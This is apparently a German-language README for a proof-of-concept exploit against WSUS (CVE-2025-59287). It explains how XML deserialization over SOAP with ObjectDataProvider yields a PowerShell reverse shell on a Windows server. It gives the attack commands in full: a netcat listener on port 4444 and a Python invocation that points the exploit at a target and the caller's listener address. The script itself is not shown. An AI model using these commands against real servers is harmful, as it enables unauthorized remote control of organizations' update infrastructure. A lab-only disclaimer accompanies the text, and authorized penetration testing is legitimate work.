
PoC-Exploit für WSUS CVE-2025-59287 unter Verwendung von XML-Deserialisierung, um über SOAP und ObjectDataProvider eine Windows-Reverse-Shell zu erreichen.
WSUS CVE-2025-59287 – XML-Deserialisierung RCE (Reverse Shell) Ein gezielter PoC zur Ausnutzung von WSUS CVE-2025-59287 über XML-Deserialisierung, um eine Windows-Reverse-Shell zu erhalten. Dieses Skript unterstützt nur eine Reverse-Shell-Payload (kein Calc-Fallback). Ziel: Windows Server mit WSUS-Rolle Technik: SOAP + ObjectDataProvider-Deserialisierung Ergebnis: cmd.exe startet eine PowerShell-Reverse-Shell zu Ihrem Listener Haftungsausschluss Nur für autorisierte Tests in Laborumgebungen. Sie sind dafür verantwortlich, alle geltenden Gesetze einzuhalten. Anforderungen Python 3.x Netzwerkzugriff auf WSUS-Endpunkte (normalerweise 8530/8531) Listener auf Ihrem Rechner (z. B. nc)
nc -lvnp 4444
python3 my-CVE-2025-59287.py -u http://TARGET:8531 -l YOUR_IP -p 4444 --debug
-u: WSUS-Basis-URL (http/https, typischerweise Port 8530/8531) -l: Ihre IP zum Empfangen der Shell -p: Ihr Listener-Port --debug: Ausführliche Ausgabe